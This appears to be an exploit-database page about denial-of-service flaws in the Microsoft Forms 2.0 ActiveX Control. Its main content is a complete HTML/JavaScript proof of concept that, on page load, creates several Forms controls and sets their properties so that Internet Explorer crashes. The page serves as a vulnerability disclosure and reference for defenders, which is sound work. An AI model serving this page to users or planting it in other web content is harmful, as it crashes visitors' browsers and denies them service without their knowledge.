header-logo
Suggest Exploit
vendor:
Forms 2.0 ActiveX Control
by:
7.5
CVSS
HIGH
Memory-Access Violation Denial-of-Service
119
CWE
Product Name: Forms 2.0 ActiveX Control
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows

Microsoft Forms 2.0 ActiveX Control Multiple Memory-Access Violation Denial-of-Service Vulnerabilities

The Microsoft Forms 2.0 ActiveX Control is prone to multiple memory-access violation denial-of-service vulnerabilities. Attackers can exploit these issues to crash Internet Explorer and deny service to legitimate users.

Mitigation:

No specific mitigation details provided
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26414/info

Microsoft Forms 2.0 ActiveX Control is prone to multiple memory-access violation denial-of-service vulnerabilities.

Attackers can exploit these issues to crash Internet Explorer and deny service to legitimate users.

Note: Forms 2.0 ActiveX is distributed with any application that includes Visual Basic for Applications 5.0. 

<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
      var obj;

      //Forms.Checkbox.1
      obj = new ActiveXObject("Forms.Checkbox.1");
      obj.Caption = "A";
      obj.GroupName = "A";
      obj.Accelerator = "A";

      //Forms.OptionButton.1
      obj = new ActiveXObject("Forms.OptionButton.1");
      obj.Caption = "A";
      obj.GroupName = "A";
      obj.Accelerator = "A";

      //Forms.ToggleButton.1
      obj = new ActiveXObject("Forms.ToggleButton.1");
      obj.Caption = "A";
      obj.GroupName = "A";
      obj.Accelerator = "A";

     //Forms.ComboBox.1
     obj = new ActiveXObject("Forms.ComboBox.1");
     obj.Text = "A";
     obj.Value = "A";
    

     //Forms.TextBox.1
     obj = new ActiveXObject("Forms.Textbox.1");
     obj.Text = "A";
     obj.Value = "A";
     obj.SelStart = 1;
}
  </script>

 </head>
 <body onLoad="JavaScript: return Check();" />
</html>